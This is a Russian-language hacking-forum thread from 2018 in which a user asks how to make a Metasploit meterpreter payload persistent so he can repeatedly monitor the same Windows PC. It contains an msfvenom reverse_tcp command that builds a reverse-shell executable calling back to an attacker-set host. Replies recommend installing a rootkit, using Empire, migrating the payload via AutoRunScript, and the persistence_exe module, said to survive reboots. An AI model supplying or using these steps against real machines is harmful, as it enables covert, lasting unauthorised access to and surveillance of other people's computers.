Как создать payload который будет работать в режиме persistence ?

kravl · 26.08.2018

Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe

sudo · 26.08.2018

kravl сказал(а):
Вопрос: Как сделать так что бы сессия была многократная и я мог прослушивать каждый раз один и тот же ПК. На сколько я знаю как-то можно это дело прописать в реестр и автозапуск только как ?
Вот так на сколько я понимаю пишется сам пейлоад для получения сессии meterpreter, но он одноразовый. Как это исправить ?
msfvenom -p windows/meterpreter/reverse_tcp LHOST=хост LPORT=порт -f exe > ~/Payload.exe

Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.

kravl · 26.08.2018

sudo сказал(а):
Тут смотря на что фантазии хватит. Например залить руткит или тот же рдесктоп настроить.

На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.

sudo · 26.08.2018

kravl сказал(а):
На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.

Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.

kravl · 26.08.2018

sudo сказал(а):
kravl сказал(а):

На сколько я помню там какая-то команда в самом метерпретере прописывается для того что бы вписать сам бэкдор в реест и автозапуск, только не помню какая. Давно не пользовался msf просто вот и забыл.

Нажмите, чтобы раскрыть...

Ну пробей по модулям что-то типо persistense и всего такого. Или покури empire framework, он вроде как для этих целей.

Ок,спасибо. Пойду изучать empire framework.

sudo · 26.08.2018

kravl сказал(а):
Ок,спасибо. Пойду изучать empire framework.

Отпишись по итогам как протестишь. Типо как работает и какие подводные.

kravl · 08.09.2018

sudo сказал(а):
Отпишись по итогам как протестишь. Типо как работает и какие подводные.

В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.

kot-gor · 08.09.2018

Как вариант используйте модуль: post/windows/manage/persistence_exe
только если у вас нет прав, то используйте USER

kravl · 21.09.2018

kravl сказал(а):
В конечном итоге я пришел к тому, что мигрирую свою нагрузку в другой процесс через AutoRunScript.
Через команду mirgate не выходило, ибо сразу сессия закрывалась и был Таймаут.

На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?

kot-gor · 21.09.2018

kravl сказал(а):
На сегодняшний день и AutoRunScript перестал работать...
Знает кто решение этой проблемы ?

я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.

kravl · 22.09.2018

kot-gor сказал(а):
я выше указал решение..работает без проблем. причем даже после перезагрузки компа в отношении которого ведется тестирование.

Где именно прописывать данный модуль ?

kravl сказал(а):
Где именно прописывать данный модуль ?

Извиняюсь за тупой вопрос я засыпал уже просто, закрывайте тему. Решено.

Все сервисы Codeby

Поиск

Поиск

Как создать payload который будет работать в режиме persistence ?

kravl

sudo

Well-known member

kravl

sudo

Well-known member

kravl

sudo

Well-known member

kravl

kot-gor

Well-known member

kravl

kot-gor

Well-known member

kravl